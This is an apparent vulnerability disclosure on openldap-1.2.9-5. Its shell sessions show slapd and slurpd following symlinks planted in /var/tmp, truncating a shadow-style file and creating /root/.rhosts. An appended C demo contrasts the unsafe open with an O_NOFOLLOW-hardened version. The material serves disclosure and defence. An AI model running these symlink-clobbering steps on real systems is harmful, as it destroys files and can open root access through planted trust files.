I was trying out the new openldap package (openldap-1.2.9-5) and I noticed it blindly creates some files which follow symlinks and will overwrite any file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------   1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt   2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x  21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt   2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x  21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx   1 root     root           13 Apr 10 20:55 NEXTID -> /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap:                                             [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------   1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap:                                        [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------   1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp (actually it follows the symlink from /usr/tmp). It will create and overwrite files.

slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt   2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x  21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt   2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x  21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--   1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--   1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd to my knowledge will only create files, it will not overwrite or truncate previously existing files. Also, after slapd is running, if you type slurpd it will try to read from /var/tmp/slurpd.status, fail, and then write to /var/tmp/slurpd.status.lock, which can be a symlink to any file you wish to create, and truncate any existing file to 0 bytes. There are other instances I noticed in the code, such as /tmp/slurpd.dump and other files, that probably behave the same. Not good.

-Stan Bubrouski
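The post above shows the effect (a root-owned file truncated to 2 bytes through a planted symlink) but not the code pattern behind it. The following is an added example, written for this page and not taken from OpenLDAP or the Red Hat errata, that reproduces the scenario in a scratch directory: `unsafe_rewrite` opens a fixed name with `O_CREAT|O_TRUNC` the way a state file like NEXTID would be written, so a pre-planted symlink redirects the truncate to its target; `safe_rewrite` is one hardened form, using `O_NOFOLLOW` plus an `fstat` ownership and link-count check before truncating, which still lets the daemon overwrite its own state file. The function names, the `victim`/`NEXTID` names in the scratch directory, and the use of `/tmp` with `mkdtemp` are assumptions of this example; it assumes Linux/glibc semantics where `open` with `O_NOFOLLOW` on a symlink fails with `ELOOP`.

```c
#define _GNU_SOURCE          /* mkdtemp() and O_NOFOLLOW on glibc (assumption) */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The pattern the post describes: open a fixed name in a world-writable
 * directory with O_CREAT|O_TRUNC. open(2) follows a symlink sitting at
 * that name, so a pre-planted link redirects the truncate and the write
 * to whatever the link points at. */
static int unsafe_rewrite(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Hardened form (this example's suggestion, not the vendor fix):
 * O_NOFOLLOW makes open(2) fail with ELOOP instead of following a symlink
 * at the final component, and the file is only truncated after fstat(2)
 * confirms it is a regular file we own with no extra hard links (a hard
 * link to someone else's file would otherwise slip past the symlink check).
 * An existing state file of our own is still overwritten, as NEXTID needs. */
static int safe_rewrite(const char *path, const char *data)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* errno == ELOOP: a planted link */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) < 0) { close(fd); return -1; }
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Read a small file into buf; returns bytes read or -1. */
static ssize_t read_small(const char *path, char *buf, size_t n)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t got = read(fd, buf, n - 1);
    close(fd);
    if (got < 0) return -1;
    buf[got] = '\0';
    return got;
}

/* Replays the post's scenario in a private scratch directory: "victim"
 * plays /etc/shadow.test, "NEXTID" is the attacker's symlink. Returns 0
 * when the unsafe writer clobbers the victim and the safe writer refuses;
 * otherwise the number of the step that did not behave as expected. */
static int run_demo(void)
{
    char dir[] = "/tmp/nextid-demo.XXXXXX";   /* constructed scratch dir */
    char victim[256], link[256], buf[64];
    int rc = 0;

    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/NEXTID", dir);

    /* 1: victim exists with real content (no link yet, so a plain create). */
    if (unsafe_rewrite(victim, "root:secret\n") != 0) rc = 2;
    /* 2: attacker plants NEXTID -> victim in the shared directory. */
    else if (symlink(victim, link) != 0) rc = 3;
    /* 3: daemon writes its state file; the victim is overwritten. */
    else if (unsafe_rewrite(link, "2\n") != 0) rc = 4;
    else if (read_small(victim, buf, sizeof buf) < 0 || strcmp(buf, "2\n") != 0) rc = 5;
    /* 4: restore the victim; the hardened writer refuses, victim untouched. */
    else if (unsafe_rewrite(victim, "root:secret\n") != 0) rc = 6;
    else if (safe_rewrite(link, "2\n") != -1 || errno != ELOOP) rc = 7;
    else if (read_small(victim, buf, sizeof buf) < 0 || strcmp(buf, "root:secret\n") != 0) rc = 8;
    /* 5: with no link planted the hardened writer creates and then
     *    overwrites its own state file. */
    else if (unlink(link) != 0 || safe_rewrite(link, "3\n") != 0 || safe_rewrite(link, "4\n") != 0) rc = 9;
    else if (read_small(link, buf, sizeof buf) < 0 || strcmp(buf, "4\n") != 0) rc = 10;

    unlink(link); unlink(victim); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = run_demo();
    if (rc == 0) puts("demo OK: O_TRUNC followed the link, O_NOFOLLOW refused it");
    else printf("demo failed at step %d\n", rc);
    return rc;
}
```

The check in `safe_rewrite` is only worth as much as the directory it runs in: the real remedy is to keep state files like NEXTID and slurpd.status out of world-writable directories altogether, with `O_NOFOLLOW` and the `fstat` check as defence in depth rather than the primary control.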
Errata released that fixes the problem.